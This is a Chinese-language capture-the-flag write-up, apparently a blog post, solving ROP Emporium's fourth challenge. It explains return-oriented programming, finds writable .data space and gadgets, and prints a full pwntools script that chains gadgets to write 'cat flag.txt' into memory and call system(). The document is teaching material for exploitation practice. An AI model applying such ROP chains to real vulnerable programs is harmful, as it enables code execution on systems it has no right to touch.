前言
1.关于ROP
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)
ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。
2. 本系列rop实战题目的背景
来自ROPEmporium
旨在通过解决一系列挑战来一步步进阶学习ROP利用技术。
操作
来到第四关
先通过rabin2 看一下基础的文件信息
或者也可以通过radare2查看是否设置了NX
可以看到NX位已经被设置了。
在前面的实验中当我们需要打印flag时,用的是文件自身的字符串,我们看看这题里有没有,直接使用strings配合grep过滤
可以看到,这种字符串是不存在的
接下来先看看涉及的函数
看看usefulFunction里会不会有我们需要的信息,反汇编它
在上图中我们看到,我们调用了system(),不过传给system的是/bin/ls,也就是说会执行ls命令
不过我们想执行的是cat flag.txt的命令,因为二进制文件中不存在这种字符串,所以我们需要手动进行。
首先需要考虑的是,把cat flag.txt写到哪个地址
我们关注输出的section headers部分。
可以看到打印出一系列的section,我们需要在其中找到一个合适的,在其中我们可以写入值。
一般我们都会选择写到data,上图中找到了一个data,地址是0x601050,我们使用readelf看看在这个section里有没有什么数据
可以看到这个地址是空的,所以我们写入这里是ok的
接下来我们还是需要ropgadget找到特定的gadget让我们能够将字符串放入这儿
这里打印出了很多gadget,那么我们需要怎样的呢
首先这个gadget要能够将值写入内存地址,在汇编中一般是通过mov体现,比如MOV [r0],r1这样子,这条汇编的意思是将值从寄存器R1移动到寄存器R0所保存的内存地址处。
下图红色选中的就符合要求
地址是0x400820
现在我们可以将值写入内存了,但是我们还需要pop,才能将值写入寄存器中
地址为0x400890
我们还需要返回并获取system()的地址,并且为了将字符串的地址作为调用system()时的参数,还需要pop rdi
地址是0x400893
现在关键的地址都有了,可以编写我们的exp了
关键点包括:
使用pop gadget将字符串的地址和字符串放在寄存器中
使用mov gadget将字符串放入给出的内存地址中
使用pop rdi gadget将字符串的地址放入寄存器
调用system(),它使用已经保存了字符串地址的rdi寄存器作为参数寄存器
完整的代码在4.py
from pwn import *
def place_string_at_address(mov_gadget_address, pop_gadget_address, string_address, string):
while len(string) % 8 != 0:
string += "\x00"
splitted_string = [string[i:i + 8] for i in range(0, len(string), 8)]
payload = ""
for i in range(len(splitted_string)):
# Place the gadgets into the payload.
payload += p64(pop_gadget_address)
payload += p64(string_address + (i * 8))
payload += splitted_string[i]
payload += p64(mov_gadget_address)
return payload
# 40 bytes of random data.
offset = 'A' * 40
offset += place_string_at_address(0x400820, 0x400890, 0x601050, "cat flag.txt")
offset += p64(0x0000000000400893) # Address of pop rdi
offset += p64(0x0000000000601050) # Address of string
offset += p64(0x00400810) # Address of system()
print(offset)
运行后如图,拿到了flag
拿到了flag
注
题目来自ROPEmporium,另参考如下资源:
https://medium.com/@int0x33/
https://paper.seebug.org/272/
https://www.rootnetsec.com/
https://bestwing.me/ropemporium-all-writeup.html
https://firmianay.github.io/2017/11/02/rop_emporium.html
https://www.oipapio.com/cn/article-5389490
http://ascii.911cha.com/
https://www.bejson.com/convert/ox2str/
https://larry.ngrep.me/2018/06/14/rop-emporium-write-up/
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR.pdf
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf
https://www.jianshu.com/p/a9ad38ad33e5
https://zhuanlan.zhihu.com/p/27339191
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html
扫一扫
646
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
